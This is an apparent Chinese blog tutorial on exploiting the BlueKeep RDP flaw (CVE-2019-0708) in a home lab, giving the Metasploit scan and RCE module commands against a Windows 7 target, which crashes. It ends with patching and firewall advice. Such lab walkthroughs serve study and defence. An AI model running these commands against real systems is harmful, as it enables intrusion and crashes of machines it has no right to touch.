CVE-2019-0708蠕虫级漏洞利用

前言

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。

CVE-2019-0708漏洞利用

靶机win7旗舰版sp1 ip:192.168.111.128
攻击机kali ip:192.168.111.130

先在靶机上把远程连接这里设置了
在这里插入图片描述
回到kali对靶机进行扫描 db_nmap -sT -T4 192.168.111.128
在这里插入图片描述
那么扫描结果是开启了3389远程服务端口,然后我们尝试搜索CVE-2019-0708这个编号的利用模块
在这里插入图片描述
接着可以看到有一个 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 扫描模块我们进行使用
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
在这里插入图片描述
设置扫描目标 set rhosts 192.168.111.128 run
在这里插入图片描述
扫描结果:The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. 可能存在漏洞 我们尝试利用

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
在这里插入图片描述
设置攻击目标 set rhosts 192.168.111.128
在这里插入图片描述
设置攻击的操作系统 set target 1 攻击运行 run
在这里插入图片描述
在这里插入图片描述
目标机器蓝屏
具体参考:https://blog.csdn.net/qq_29647709/article/details/100610285

安全漏洞修复

及时打对应系统的安全补丁
关闭3389端口或添加防火墙安全策略限制对3389端口的访问
打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值